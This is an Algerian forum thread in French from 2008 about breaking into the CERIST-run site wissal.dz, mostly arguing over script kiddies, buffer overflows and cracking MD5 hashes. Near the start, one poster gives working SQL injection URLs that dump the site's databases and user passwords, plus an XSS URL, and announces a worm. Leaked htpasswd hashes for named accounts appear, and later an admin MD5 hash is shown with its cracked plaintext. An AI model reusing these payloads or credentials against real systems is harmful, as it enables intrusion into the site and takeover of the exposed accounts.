Messageire Wissal du Cerist

[Invité HAVOC]

*** Ce genre d'informations ne sont pas admises sur ce forum ***

[badrh0]

En fait ,

En tant que je suis Un Grey HAT j'ai fait un petit test d'un 5mn

 

Un bug SQL injection simple;

pour avoire tout les database installè sur leur server Mysql

 

http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,schema_name,null,null,null,null,null,null,null,null+from+information_schema.SCHEMATA

 

Les passwords et les Users:

http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,concat(username,0x3e,user_password),null,null,null,null,null,null,null,null+from+Wforum.Wf_users

 

Une faille XSS, je vais codè une Worm JS pour cette XSS et je la poste;

http://www.wissal.dz/index.php?file=archivenews&nat=alert("XSS")

 

Passwd Hash Disclosure (DES Unix (htaccess)):

http://www.wissal.dz/passwd
http://www.wissal.dz/admin

 

/UntilX

 

Saha Unix +1 pour toi (mais je les avais déja )

Par contre ce que j'ai pas pu faire c'est déchiffrer ça :

cip:/lWBYZtMu1IwQ
admin:aLrm37XQuIu12
anep1901:0avLGdWTspfvU

Si tu y arrive alors là oui tu prouveras que tu es un vrai de vrai

[Invité HAVOC]

Ne le prend pas mal mais c'est toi qui est a coté de la plaque ! Son exemple est tout a fait concordant si translaté vers l'univers des h@ckers, je m'éxplique, un h@cker a sûrement d'autres chats a fouetter que de concevoir un shell perso, je ne dis pas que ce n'est pas préférable, mais si tu as un outil sous la main, alors vaut mieux s'en servir ! Maintenant libre a toi d'utiliser une fonction dont tu ne comprends pas le fonctionnement si tu veux arriver a tes fins ! Mais je ne crois vraiment pas que quelqu'un qui n'y connais strictement rien pourrait arriver loin en utilisant des outils trouvés sur le net !

 

Et voilà que tu refais encore la même erreur ! Je ne parle pas de conception mais de compréhension ! Ce sont des termes simples à comprendre normalement !

Un shell est un outil qui permet d'automatiser ou simplifier une tache. C'est facile d'injecter des commandes via un shell... cela ne veut pas dire pour autant qu'on comprend comment le shell fonctionne.

Je connais pleins de noobs qui hack régulièrement des sites en exploitants de failles connus et des shell sans ne connaitre ni le langage PHP ni le fonctionnement concret d'un shell... il ne faut pas exagérer les choses, l'exploitation d'un backdoor tel qu'un C99 relève du jeu d'enfant !

 

 

 

Un h@ker (pas un script kiddy) comprend les fonctionnement d'environs ... disons 50% du c99 par exemple, mais il ne saurait (sans grandes difficultés) coder ces 50% ! Un informaticien (bon) sais comment fonctionne le browser (disons IE7) a disons 50% mais il ne saurait comprendre un buffer overflow (sans grandes difficultés) dans ledit browser !

 

Un script kiddies coder un C99... laisse moi rire ! Tu veux dire copier coller et non programmer !

J'ai connu pleins de script kiddies qui ont attaqués pas mal de sites algériens, après avoir discuté avec eux j'ai vu qu'ils n'étaient pas capables ni de coder en PHP ni d'effectuer correctement des requêtes SQL. Ces des gens qui "singent" des méthodes relativement simples, qui sont inscrits à de nombreux forum et qui demandent de l'aide dès la moindre difficulté, leur seul plaisir et de tager le net de leurs pseudos.

 

Comprendre un bufferOverFlow ? Ce n'est surement pas un script kiddies ou un apprenti hacker qui comprendra mieux un BoF qu'un informaticien, il faut déjà maitriser un langage de programmation, avoir des connaissances en assembleur et en architecture des machines... Bref... entre comprendre et maitriser il y a tout un monde... C'est encore une fois facile de prendre un exploit du net pour faire un bufferOverFlow.

 

 

Je suis d'accord avec toi, mais ça m'étonnerait que quelqu'un qui ne sait même pas coder du php ou du c aille chercher a pirater un site, il peut bien sûr être tenté mais il ne fera rien

Et tu as en face l'étudiant qui (aussi bon soit-il) se débat avec ses études d'informatique, alors je ne crois pas qu'en apprenant les requetes SQL il ait l'idée de faire une injection SQL, sinon ça serait un vrai visionnaire

 

Qu'est ce qu'est une injection SQL ? Penses-tu que cela relève du miracle ? Il suffit de bien réfléchir à son code pour les éviter, de plus y'a pleins d'outils qui permettent de vérifier si son application en contient ou pas. Les Injection SQL sont traitées lors qu'on étudie les bases de données et la programmation web.

Il ne faut pas prendre pour exemple les ingénieurs qui obtiennent une moitié de diplôme et qui ne s'intéressent pas à leur métier ou encore les techniciens qui se retrouvent à faire un boulot qui les dépasses.

[Invité HAVOC]

Saha Unix +1 pour toi (mais je les avais déja )

Par contre ce que j'ai pas pu faire c'est déchiffrer ça :

cip:/lWBYZtMu1IwQ
admin:aLrm37XQuIu12
anep1901:0avLGdWTspfvU

Si tu y arrive alors là oui tu prouveras que tu es un vrai de vrai

 

Ah parce que tu as pu déchiffer le mot de passe admin de la boite ? Vu les mots de passe habituellement utilisé par CERIST cela m'étonnerait que tu y soit arriver même avec des Go de rainbow tables.

 

Pour ce qui est du fichier que tu mentionnes, cela à tout l'air d'etre le contenu d'un htpasswd lequel utilise un cryptage MD5 spécifique à apache

[badrh0]

Et voilà que tu refais encore la même erreur ! Je ne parle pas de conception mais de compréhension ! Ce sont des termes simples à comprendre normalement !

Je devrais y arriver merci

 

Un shell est un outil qui permet d'automatiser ou simplifier une tache. C'est facile d'injecter des commandes via un shell... cela ne veut pas dire pour autant qu'on comprend comment le shell fonctionne.

Je connais pleins de noobs qui hack régulièrement des sites en exploitants de failles connus et des shell sans ne connaitre ni le langage PHP ni le fonctionnement concret d'un shell... il ne faut pas exagérer les choses, l'exploitation d'un backdoor tel qu'un C99 relève du jeu d'enfant !

Ok j'ai compris, mais un n00b devrait avoir beaucoup d'ingeniosité pour uploader les shell sur le serveur ciblé en dans ce cas je crois qu'on devrait enlever un zéro et l'appeler n0b

Ne pas connaitre le PHP et h@cker ???? ça tient du miracle

 

Comprendre un bufferOverFlow ? Ce n'est surement pas un script kiddies ou un apprenti hacker qui comprendra mieux un BoF qu'un informaticien, il faut déjà maitriser un langage de programmation, avoir des connaissances en assembleur et en architecture des machines... Bref... entre comprendre et maitriser il y a tout un monde... C'est encore une fois facile de prendre un exploit du net pour faire un bufferOverFlow.

Je ne connais pas beaucoup d'informaticiens au bled qui pourront m'éxpliquer comment marche un BoF

 

Qu'est ce qu'est une injection SQL ? Penses-tu que cela relève du miracle ? Il suffit de bien réfléchir à son code pour les éviter, de plus y'a pleins d'outils qui permettent de vérifier si son application en contient ou pas. Les Injection SQL sont traitées lors qu'on étudie les bases de données et la programmation web.

Je disais seulement cher ami que quelqu'un qui étudie le SQL et son utilisation notament dans les pages php n'aurait pas tout a coup l'idée de l'injection si il n'en a pas auparavent entendu parlé et ces outils dont tu parles sont utilisés par les h@ckers (script kiddies, crackers, n00b, n0b choisissez ce que vous voulez ) pour attaquer des sites

 

Il ne faut pas prendre pour exemple les ingénieurs qui obtiennent une moitié de diplôme et qui ne s'intéressent pas à leur métier ou encore les techniciens qui se retrouvent à faire un boulot qui les dépasses.

Malheureusement la majorité gagne

 

JE NE SAIS PAS POURQUOI JE SUIS AUSSI SUSCEPTIBLE MOI HAVOC !!!?

Bah je ne sais pas mon amis

 

Ah parce que tu as pu déchiffer le mot de passe admin de la boite ? Vu les mots de passe habituellement utilisé par CERIST cela m'étonnerait que tu y soit arriver même avec des Go de rainbow tables.

Si tu parles de ça 9fcca8a6f2920f02c0b7b49b140b1d36 oui ! n'importe quel décrypteur sur le net te le donnears vu que c'est con comme mot de passe ou alors j'ai pas compris

Mais vu que le forum est a l'abondant (et le site aussi) même un h@cker va prendre ses jambes a son coup

 

Pour ce qui est du fichier que tu mentionnes, cela à tout l'air d'etre le contenu d'un htpasswd lequel utilise un cryptage MD5 spécifique à apache

 

Non je ne crois pas, plutôt un cryptage concocté par un des rares a s'intéresser a ce qu'il fait au cerist .

MD5 spécifique à apache , peux-tu nous éclairer ?

[SecDz]

un h@cker a sûrement d'autres chats a fouetter que de concevoir un shell perso, je ne dis pas que ce n'est pas préférable, mais si tu as un outil sous la main, alors vaut mieux s'en servir ! Maintenant libre a toi d'utiliser une fonction dont tu ne comprends pas le fonctionnement si tu veux arriver a tes fins !

 

Merci, c'est la meilleur définition d'un "Script kiddies" que j'ai entendu...au moins tu as apporté quelque chose

 

Par contre ce que j'ai pas pu faire c'est déchiffrer ça :

cip:/lWBYZtMu1IwQ

admin:aLrm37XQuIu12

anep1901:0avLGdWTspfvU

 

Tu confirmes....et en même temps tu me déçois, à un moment j'au cru que tu avais du potentiel.....dommage !!!

[SecDz]

En fait ,

En tant que je suis Un Grey HAT j'ai fait un petit test d'un 5mn

 

Où est le Grey dans tous celà ? ....poster ça dans un forum n'est pas vraiment gris

[badrh0]

Merci, c'est la meilleur définition d'un "Script kiddies" que j'ai entendu...au moins tu as apporté quelque chose

Je n'y peux rien si tu es mazo mais ravi de t'avoir aidé

 

Tu confirmes....et en même temps tu me déçois, à un moment j'au cru que tu avais du potentiel.....dommage !!!

Le peu que j'ai me satisfait amplement je n'ai rien à prouver à personne sauf a moi même, et tant pis pour ceux à qui ça ne plaît pas

[SecDz]

J'accepte ses éxcuses parceque c'est moi le co'n qui a laissé ma porte ouverte lol

 

Que veux-tu ? j'aime jouer a la roulette russe

 

Pour terminer le sujet (pour moi biensûr...vous faites ce que voulez), je retiens deux choses :

 

- Tu admet que quelqu'un te fasse du mal si tu as mal agit

- Tu aimes le risque

 

Je "prend note"

[badrh0]

Pour terminer le sujet (pour moi biensûr...vous faites ce que voulez), je retiens deux choses :

 

- Tu admet que quelqu'un te fasse du mal si tu as mal agit

- Tu aimes le risque

 

Bon SecDz malgré le respect que je te dois je ne comprend rien a ta philo a la noix mais si j'ai bien compris:

- Le 1er point est plutôt un raisonnement naturel pour quelqu'un doté d'une conscience

- Le deuxieme point est plutôt courant chez les gens, mais ce n'est pas mon cas, ce que j'ai dis c'est juste pour plaisenter ça sert a ça les ,

 

Pour ne pas clore le sujet, le sujet ne tourne pas autour de moi mais des gens du CERIST, alors ne t'embrouille pas camarade

 

Je "prend note"

Là tu me fous les j'tons camarade tu vas faire quoi ? me traquer et me dénoncer a la fameuse gendarmerie du net dont abderahime_13 a parlé

Non plus serieusement je crois que si j'était par exemple en Europe je ne ferais sûrement pas toutes ces conneries de kiddy , c'est juste qu'ici au bled tout le monde fais ce qu'il veut alors je fais pareil .Ne vas pas croire que je n'aime pas ma patrie, je rêve de la servire en bien mais malheureusement on m'empèche de le faire pour le moment alors je me défoule un peu

[Invité HAVOC]

Je devrais y arriver merci

 

 

Ok j'ai compris, mais un n00b devrait avoir beaucoup d'ingeniosité pour uploader les shell sur le serveur ciblé en dans ce cas je crois qu'on devrait enlever un zéro et l'appeler n0b

Ne pas connaitre le PHP et h@cker ???? ça tient du miracle

Ben les exploits de milw0rm est compagnie servent à quoi ? il y a tout plein d'exploits permettant d'injecter du code, un shell, d'uploader des fichiers, d'obtenir des mots de passe...etc. Avec ces exploits on arrive à uploader un backdoor sur le serveur... rien de miraculeux.

 

Je ne connais pas beaucoup d'informaticiens au bled qui pourront m'éxpliquer comment marche un BoF

 

Mais si mais si ! Surtout qu'ici ils font beaucoup de C/C++ donc les accès mémoires ils sont sensé connaitre... pour ne parler que de ça.

 

Je disais seulement cher ami que quelqu'un qui étudie le SQL et son utilisation notament dans les pages php n'aurait pas tout a coup l'idée de l'injection si il n'en a pas auparavent entendu parlé et ces outils dont tu parles sont utilisés par les h@ckers (script kiddies, crackers, n00b, n0b choisissez ce que vous voulez ) pour attaquer des sites

 

Pas du tout, ce sont des outils utilisé normalement principalement par les développeur et les spécialiste en sécurité, c'est comme la backtrack qui est une distribution linux spécialisée dans l'audit en sécurité à la base et non un outil de script kiddies (d'ailleurs je connais encore aucun apprenti hacker qui sait utiliser l'ensemble des outils fournis par cette distribution).

 

Si tu parles de ça 9fcca8a6f2920f02c0b7b49b140b1d36 oui ! n'importe quel décrypteur sur le net te le donnears vu que c'est con comme mot de passe ou alors j'ai pas compris

Mais vu que le forum est a l'abondant (et le site aussi) même un h@cker va prendre ses jambes a son coup

Oui oui je parlais bien de ce mot de passe que tu as cité. (enfin ce hash MD5)

 

Non je ne crois pas, plutôt un cryptage concocté par un des rares a s'intéresser a ce qu'il fait au cerist .

MD5 spécifique à apache , peux-tu nous éclairer ?

 

Et pourtant il en a tout l'air. C'est un fichier généré avec la commande UNIX : htpasswd

Tu peux selon ton choix soit utilisé un cryptage à base de MD5 spécifique à apache (non portable sur d'autre machines) ou un cryptage basé sur le DES (fonction "crypt" qui sert aussi aux shadows) ou encore en SHA.

[Boss_Med]

@HAVOC une question est ce qu'il y a des serveurs public contenant des tables rainbow très volumineux merci

[abderahime_13]

 

Si tu parles de ça 9fcca8a6f2920f02c0b7b49b140b1d36 oui ! n'importe quel décrypteur sur le net te le donnears vu que c'est con comme mot de passe

ou alors j'ai pas compris

 

Hi Havoc,

 

Tu peux dire à ton ami de nous filer le résultat inverse de ce bash crypté en MD5 !!! ... , je t'attend 24H en plus

[badrh0]

Salut

 

Ben les exploits de milw0rm est compagnie servent à quoi ? il y a tout plein d'exploits permettant d'injecter du code, un shell, d'uploader des fichiers, d'obtenir des mots de passe...etc. Avec ces exploits on arrive à uploader un backdoor sur le serveur... rien de miraculeux.

Je parle d'un piratage ciblé non à l'aveuglette ! dans ce cas milw0rm ne sert a rien

 

Mais si mais si ! Surtout qu'ici ils font beaucoup de C/C++ donc les accès mémoires ils sont sensé connaitre... pour ne parler que de ça.

Du C/C++ laisse moi rire c'est plutôt du copiage qu'ils font ou alors on vit dans deux mondes parallèles toi et moi (PS: je parle bien sûr de la majorité parceque j'en connais du bled qui rivaliserait avec les meilleurs) et puis aprés c'est pas parcequ'on maitrise le C++ qu'on peut confectionner un BoF, je parierais que la majorité n'arriveraient pas t'éxpliquer comment se fait la gestion de la mémoire au niveau le plus bas ! alors un BoF ! (PS: Moi même je ne pourrais pas fabriquer un BoF ni t'éxpliquer convenablement la gestion de la mémoire mais je ne suis pas informaticien )

 

Pas du tout, ce sont des outils utilisé normalement principalement par les développeur et les spécialiste en sécurité, c'est comme la backtrack qui est une distribution linux spécialisée dans l'audit en sécurité à la base et non un outil de script kiddies (d'ailleurs je connais encore aucun apprenti hacker qui sait utiliser l'ensemble des outils fournis par cette distribution).

Je ne vois ce qui pourrait l'en empecher !!?

 

Et pourtant il en a tout l'air. C'est un fichier généré avec la commande UNIX : htpasswd

Tu peux selon ton choix soit utilisé un cryptage à base de MD5 spécifique à apache (non portable sur d'autre machines) ou un cryptage basé sur le DES (fonction "crypt" qui sert aussi aux shadows) ou encore en SHA.

 

Merci pour l'info c'est juste que j'ai mal interprété un drole de fichier que j'ai trouvé

 

Oui oui je parlais bien de ce mot de passe que tu as cité. (enfin ce hash MD5)

Havoc tu peux dire a ton ami (puisqu'il ne veut pas me parler directement, ptêt que je suis un impie pou lui mais dans quelle religion, je ne sais pas ) qu'il aille voir par exemple par ici ==> http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/ il sera surpris par le résultat

[Invité HAVOC]

Havoc tu peux dire a ton ami (puisqu'il ne veut pas me parler directement, ptêt que je suis un impie pou lui mais dans quelle religion, je ne sais pas ) qu'il aille voir par exemple par ici ==> http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/ il sera surpris par le résultat

 

En tout cas les rainbow tables de milw0rm qui sont d'habitude bien fournies n'ont pas pu venir à bout du hash MD5 du compte admin, la preuve ici : http://www.milw0rm.com/md5/list.php?start=139470

 

Il faut croire qu'il est plus compliqué que ça

[abderahime_13]

Salut

 

Havoc tu peux dire a ton ami (puisqu'il ne veut pas me parler directement, ptêt que je suis un impie pou lui mais dans quelle religion, je ne sais pas ) qu'il aille voir par exemple par ici ==> http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/ il sera surpris par le résultat

 

Bof, je suis supris ...

 

j'ai pensé que tu sois l'ami du Havoc, mais, apparement je me suis trompé ..

Bref, tu dois savoir une chose, on peut jamais -voir impossible- de calculer TOUT les msgs cryptés par MD5, car, et pour la seule raison, c'est que l'algorithme MD5 est basé sur une méthode de hashage pour obtenir l'emprunte numérique, mais à UN SEUL SENS ...

 

CTRL+d !

[badrh0]

Bof, je suis supris ...

 

j'ai pensé que tu sois l'ami du Havoc, mais, apparement je me suis trompé ..

Bref, tu dois savoir une chose, on peut jamais -voir impossible- de calculer TOUT les msgs cryptés par MD5, car, et pour la seule raison, c'est que l'algorithme MD5 est basé sur une méthode de hashage pour obtenir l'emprunte numérique, mais à UN SEUL SENS ...

 

CTRL+d !

 

Avant tout salam,

La fonction md5 est une fonction non-inversible (si tu préfère une matrice de déterminant nul ) oui, mais il y'a quelques années (je ne sais pas quand éxactement) des chrcheurs japonais ont découvert des collisions dans ce mode de cryptage, ce qui en fait un mode non sûr mais néaumoin largement utilisé de nos jours, bref, le décryptage se fait (à mon avis) par des comparaisons, et le hash qu'on avait (celui de wissal) contient un mot trés répondu (en sois même c'est con de mettre ce mot dans un pass) et c'est pour cela que la pâte a pris

Modifié le 20 août 2008 par badrh0

[badrh0]

En tout cas les rainbow tables de milw0rm qui sont d'habitude bien fournies n'ont pas pu venir à bout du hash MD5 du compte admin, la preuve ici : http://www.milw0rm.com/md5/list.php?start=139470

 

Il faut croire qu'il est plus compliqué que ça

 

Salut HAVOC;

9fcca8a6f2920f02c0b7b49b140b1d36 ===> admin2002

Il ne faut pas croire que milw0rm est le meilleur en la matière, certains gardent jalousement les propres bases et j'en connais même certains (allez voir du coté de waraxe) qui te décrypteraient n'importe quoi, et je le dis par éxpérience, il m'ont fourni des passes que tu ne peux pas imaginer décrypter, mais bien sûr ils gardent leurs scripts pour eux

Modifié le 20 août 2008 par badrh0

[Blub]

Avant tout salam,

La fonction md5 est une fonction non-inversible (si tu préfère une matrice de déterminant nul ) oui, mais il y'a quelques années (je ne sais pas quand éxactement) des chrcheurs japonais ont découvert des collisions dans ce mode de cryptage, ce qui en fait un mode non sûr mais néaumoin largement utilisé de nos jours, bref, le décryptage se fait (à mon avis) par des comparaisons, et le hash qu'on avait (celui de wissal) contient un mot trés répondu (en sois même c'est con de mettre ce mot dans un pass) et c'est pour cela que la pâte a pris

Premièrement si khouna le "Cracker" (plutot script kiddie, va voir le message que j'ai écris la dernière fois à propos de toi http://www.forumdz.com/showpost.php?p=30546&postcount=69 )

 

Elmouhim, il y a déjà dans cette quote quelques erreurs, c'est des chinois et non des japonais, et c'était en 2004 sous le titre "Donne moi un hash je te donnerai un fichier qui lui correspond"

 

Maintenant pour prouver que tu es un ignorant, soit en informatique (entre autre les fonctions de hashage) soit en Français (je laisse le benefice du doute) t'as dis :

"hash qu'on avait (celui de wissal) contient un mot trés répondu :D"

en utilisant le mot "contient" tu t'es "self pwned" comme on dit chez nous.

pourquoi? je te laisse chercher...

 

aya salam

[badrh0]

Premièrement si khouna le "Cracker" (plutot script kiddie, va voir le message que j'ai écris la dernière fois à propos de toi http://www.forumdz.com/showpost.php?p=30546&postcount=69 )

Wallah je ne sais pas pourquoi vous êtes une majorité à être susceptible !! Ou alors c'est moi ! Qu'ai-je donc fais pour mériter ça Mais bon, comme j'ai un bon fond je vous pardonne à tous

 

Elmouhim, il y a déjà dans cette quote quelques erreurs, c'est des chinois et non des japonais, et c'était en 2004 sous le titre "Donne moi un hash je te donnerai un fichier qui lui correspond"

Bah tu sais ils parlent tous chinois (mais tu pourrais comme même me réctifier en étant gentil )

 

 

Maintenant pour prouver que tu es un ignorant,

Là je trouve comme même que c'est petit et mésquin même de ta part , parceque je ne suis pas prétentieux et je n'ai jamais dis que je sais tout, c'est plutôt toi qui en donne l'air, bref l'ignorant à mon avis est celui qui crois savoir tout ....

 

soit en informatique (entre autre les fonctions de hashage)

J'ai déja dis que je ne suis pas dutout informaticien, je ne l'ai jamais étudié nul part sauf sur mon ecran, alors tu peux comme même laisser passer quelques fautes d'un autodidacte

 

soit en Français (je laisse le benefice du doute)

On n'a pas tous le word a coté de nous

 

t'as dis :

"hash qu'on avait (celui de wissal) contient un mot trés répondu :D"

en utilisant le mot "contient" tu t'es "self pwned" comme on dit chez nous.

pourquoi? je te laisse chercher...

Je ne comprends pas ce que j'ai dis qui pourrait se retourner contre moi mais bon, je suis sûr que tu vas le dire a l'IGNORANT

 

aya salam

Ca se dit en premier cher ami

 

Pour finir c'est la plus désagréable conversation que j'ai eu sur le net depuis que j'ai appris a taper sur un clavier tu devrais ptêt revoir ton coté sociable (si jamais tu en as un ) et si tu as quelquechose a me dire ou une dent contre moi dis le carément n'ais pas peur

[Blub]

tu devrais ptêt revoir ton coté sociable (si jamais tu en as un

J'en ai pas désolé

 

sinon, pour le mot "contient" je vais laisser quelqu'un d'autre te l'expliquer,, si après quelques jours personne ne répond je serai vraiment déçu

 

aya ya djma3 il a dit "contient un mot"

[badrh0]

J'en ai pas désolé

 

sinon, pour le mot "contient" je vais laisser quelqu'un d'autre te l'expliquer,, si après quelques jours personne ne répond je serai vraiment déçu

 

aya ya djma3 il a dit "contient un mot"

 

Bof si tu veux dire que le hash en lui même ne contient pas d'information sur le mot de passe mais que ce n'est qu'une signature je crois que tu t'emportes pour rien c'était juste un abus de language de ma part si tu veux je reformule

 

... et le hash qu'on avait (celui de wissal) est celui d'un mot qui contient un autre mot trés répondu ....

 

Si c'était ça mon frère tu fais des vagues pour rien

[Blub]

Bof si tu veux dire que le hash en lui même ne contient pas d'information sur le mot de passe mais que ce n'est qu'une signature je crois que tu t'emportes pour rien c'était juste un abus de language de ma part si tu veux je reformule

 

 

 

Si c'était ça mon frère tu fais des vagues pour rien

 

mais non, ça n'a rien à voir, cherche, cherche

[Invité HAVOC]

Ce qu'il veut dire, c'est que tu utilises un mot de passe composé de mots communs n'est pas dangereux en soit car le hashage MD5 n'est "crackable" qu'avec trois méthodes :

- Le bruteforce à l'aide d'un dico : Dans ce cas on se limite à des mots simples, comme par exemple : maison, chat, azerty...etc.

- Le bruteforce simple (si j'ose dire) : Cette méthode consiste à tout simplement essayer toutes les possibilités possibles... autant dire que si le mot de passe est long il faudra des années pour le trouver (voir des siècles ou plus).

- Le bruteforce à l'aide de rainbow tables : Similaire au brute force simple sauf qu'on utilise des tables de hash pré-calculés, donc plus on a des tables riches (grosses) plus on a de chances de trouver le mot de passe... cette méthode est aussi plus rapide que le brute force simple.

 

Les mots de passe du genre : LeDimancheJeVaisAlaPêche sont à mon avis sûr même si composé de mots du dico.

 

Personnellement, je connais des sites où l'on peut télécharger des Go de rainbow table pour les utiliser avec un soft de crackage ou créer un serveur. Il y a même le site du projet rainbow table.

[Blub]

Ce qu'il veut dire, c'est que tu utilises un mot de passe composé de mots communs n'est pas dangereux en soit car le hashage MD5 n'est "crackable" qu'avec trois méthodes :

- Le bruteforce à l'aide d'un dico : Dans ce cas on se limite à des mots simples, comme par exemple : maison, chat, azerty...etc.

- Le bruteforce simple (si j'ose dire) : Cette méthode consiste à tout simplement essayer toutes les possibilités possibles... autant dire que si le mot de passe est long il faudra des années pour le trouver (voir des siècles ou plus).

- Le bruteforce à l'aide de rainbow tables : Similaire au brute force simple sauf qu'on utilise des tables de hash pré-calculés, donc plus on a des tables riches (grosses) plus on a de chances de trouver le mot de passe... cette méthode est aussi plus rapide que le brute force simple.

 

Les mots de passe du genre : LeDimancheJeVaisAlaPêche sont à mon avis sûr même si composé de mots du dico.

 

Personnellement, je connais des sites où l'on peut télécharger des Go de rainbow table pour les utiliser avec un soft de crackage ou créer un serveur. Il y a même le site du projet rainbow table.

 

Exacte donc le fait que le pwd contient "admin" ou je ne sais quoi n'est aucunement un problème de sécurité.

 

Il y a même un projet de génération de Rainbow table en distribué (google) qui est très bien, mais le problème c'est que le soft n'est dispo que pour Windows, il aurait était très bien s'il était dispo pour linux vu que plusieurs serveur pouront y participé